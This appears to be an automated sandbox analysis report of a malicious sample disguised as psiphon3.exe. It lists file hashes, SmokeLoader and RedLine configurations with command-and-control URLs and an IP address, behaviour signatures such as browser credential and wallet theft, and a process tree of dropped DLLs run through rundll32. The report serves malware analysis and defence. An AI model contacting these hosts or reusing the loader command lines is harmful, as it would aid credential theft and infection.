Analysis

  • max time kernel
    1523s
  • max time network
    2702s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 19:16

General

  • Target

    psiphon3.exe

  • Size

    6.8MB

  • MD5

    2ebc28739e3c11341136fc5404c44579

  • SHA1

    6adb43880cac3dfe5a5356d19d588648739763e7

  • SHA256

    fa2ff0f2de91ce2de9ac142cdffb56ec1716c9e16f561cda689f4f2010eceeb4

  • SHA512

    c296a128487eb6fe393296b38ea290e7e2bdc7dce3dddcdc3f32d709da04e1b3bb488f3dcf1b0d9b36b937a867fd3d1f7b3c14131219875aa60a29339ac8c6f1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://abpa.at/upload/

http://emaratghajari.com/upload/

http://d7qw.cn/upload/

http://alumik-group.ru/upload/

http://zamkikurgan.ru/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

media272256

C2

92.255.57.115:11841

Signatures

  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • OnlyLogger Payload 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 60 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Program crash 4 IoCs
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:864
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {AFEF4AE8-5095-44B2-BBE8-A5ADF31A7167} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
          3⤵
            PID:1484
            • C:\Users\Admin\AppData\Roaming\gugjuus
              C:\Users\Admin\AppData\Roaming\gugjuus
              4⤵
              • Executes dropped EXE
              PID:676
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {3CCA89C3-32C2-4F6F-A709-8664F3908C8C} S-1-5-18:NT AUTHORITY\System:Service:
            3⤵
              PID:1768
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                4⤵
                  PID:2712
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                  4⤵
                    PID:2080
                  • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                    "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                    4⤵
                      PID:2128
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                      4⤵
                        PID:3040
                      • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                        "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                        4⤵
                          PID:1172
                        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                          4⤵
                            PID:2168
                          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                            4⤵
                              PID:4044
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                          2⤵
                          • Drops file in System32 directory
                          • Checks processor information in registry
                          • Modifies data under HKEY_USERS
                          • Modifies registry class
                          • Suspicious behavior: GetForegroundWindowSpam
                          PID:2516
                        • C:\Windows\system32\msiexec.exe
                          C:\Windows\system32\msiexec.exe /V
                          2⤵
                          • Enumerates connected drives
                          • Drops file in Windows directory
                          PID:1380
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding A3173151C0C0DDF145CF99D0D9E9A4A7 C
                            3⤵
                              PID:2684
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding 78495EE189235C5924EDF5C2C7DB2091
                              3⤵
                                PID:2816
                                • C:\Windows\SysWOW64\taskkill.exe
                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  4⤵
                                  • Kills process with taskkill
                                  PID:2728
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding AD2EA1AD18DC04DCF8DE6E3C773827DB M Global\MSI0000
                                3⤵
                                  PID:2128
                              • C:\Windows\system32\rundll32.exe
                                rundll32.exe "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main
                                2⤵
                                  PID:1616
                                  • C:\Windows\system32\rundll32.exe
                                    "rundll32.exe" "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main pGgCk3Us2 w8KExqCmF
                                    3⤵
                                      PID:2744
                                  • C:\Windows\system32\rundll32.exe
                                    rundll32.exe "C:\ProgramData\aeche.dll" main
                                    2⤵
                                      PID:1532
                                      • C:\Windows\system32\rundll32.exe
                                        "rundll32.exe" C:\ProgramData\aeche.dll main yufh
                                        3⤵
                                          PID:2620
                                      • C:\Windows\SysWOW64\svchost.exe
                                        C:\Windows\SysWOW64\svchost.exe -k LocalService
                                        2⤵
                                          PID:1336
                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,VkMTVndW
                                            3⤵
                                              PID:2028
                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,fkA9UQ==
                                                4⤵
                                                  PID:2616
                                                  • C:\Windows\system32\rundll32.exe
                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                    5⤵
                                                      PID:2328
                                                      • C:\Windows\system32\ctfmon.exe
                                                        ctfmon.exe
                                                        6⤵
                                                          PID:3060
                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,YzIw
                                                      4⤵
                                                        PID:1712
                                                        • C:\Windows\system32\rundll32.exe
                                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                          5⤵
                                                            PID:2972
                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,bFUW
                                                          4⤵
                                                            PID:1752
                                                            • C:\Windows\system32\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                              5⤵
                                                                PID:2848
                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,QiYb
                                                              4⤵
                                                                PID:2212
                                                                • C:\Windows\system32\rundll32.exe
                                                                  C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                  5⤵
                                                                    PID:3044
                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,mWI2
                                                                  4⤵
                                                                    PID:7852
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                      5⤵
                                                                        PID:7964
                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,plJT
                                                                      4⤵
                                                                        PID:8172
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                          5⤵
                                                                            PID:7976
                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,gyBiR3lS
                                                                          4⤵
                                                                            PID:7896
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                              5⤵
                                                                                PID:7816
                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,dE0mWU1RMg==
                                                                              4⤵
                                                                                PID:7900
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                  5⤵
                                                                                    PID:8164
                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,jkFMTDg=
                                                                                  4⤵
                                                                                    PID:1228
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                      5⤵
                                                                                        PID:2044
                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,jmEsZFVNSWRv
                                                                                      4⤵
                                                                                        PID:2896
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                          5⤵
                                                                                            PID:924
                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,bFIZczY=
                                                                                          4⤵
                                                                                            PID:7864
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                              5⤵
                                                                                                PID:2744
                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,dRpaU0hDb3A=
                                                                                              4⤵
                                                                                                PID:2944
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                  5⤵
                                                                                                    PID:8144
                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,XFgDdEM4
                                                                                                  4⤵
                                                                                                    PID:8276
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                      5⤵
                                                                                                        PID:8320
                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,VDgbNXdJ
                                                                                                      4⤵
                                                                                                        PID:8448
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                          5⤵
                                                                                                            PID:8648
                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,hjlMNEFR
                                                                                                          4⤵
                                                                                                            PID:8932
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                              5⤵
                                                                                                                PID:9084
                                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,SjYTVkM4RERN
                                                                                                              4⤵
                                                                                                                PID:9176
                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,b0IsSURF
                                                                                                                4⤵
                                                                                                                  PID:8244
                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                    5⤵
                                                                                                                      PID:8312
                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,hFgrbkd3ZQ==
                                                                                                                    4⤵
                                                                                                                      PID:2444
                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                        5⤵
                                                                                                                          PID:8572
                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,YEgXWVBN
                                                                                                                        4⤵
                                                                                                                          PID:364
                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                            5⤵
                                                                                                                              PID:8540
                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,Z1QSQ0pRYTE=
                                                                                                                            4⤵
                                                                                                                              PID:9100
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                5⤵
                                                                                                                                  PID:8856
                                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,RDIRUHNmVA==
                                                                                                                                4⤵
                                                                                                                                  PID:8400
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                    5⤵
                                                                                                                                      PID:8300
                                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,dUMxWEM5
                                                                                                                                    4⤵
                                                                                                                                      PID:8536
                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                        5⤵
                                                                                                                                          PID:8544
                                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,OwQ2YVFm
                                                                                                                                        4⤵
                                                                                                                                          PID:8364
                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                            5⤵
                                                                                                                                              PID:1100
                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,qkZjMQ==
                                                                                                                                            4⤵
                                                                                                                                              PID:8656
                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                5⤵
                                                                                                                                                  PID:8796
                                                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,VBNAbw==
                                                                                                                                                4⤵
                                                                                                                                                  PID:3844
                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4116
                                                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,nGE6a0o3YlI=
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4616
                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4856
                                                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,GAAXMjRyTw==
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5280
                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5580
                                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,UDEe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6100
                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:6624
                                                                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,c1EhOG1WSTY=
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2720
                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:940
                                                                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,VD4VM3lFUA==
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3752
                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4716
                                                                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,n2I8dVZwcVFJ
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:9536
                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:9592
                                                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,MgMuQlpL
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:9692
                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:9760
                                                                                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,i1E5UWM5
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:9860
                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:9972
                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:7824
                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:816
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\psiphon3.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\psiphon3.exe"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:1704
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1800
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOToxNzo0NS4zMjRaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:1748
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1056
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1120
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOToxODozOS42ODJaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
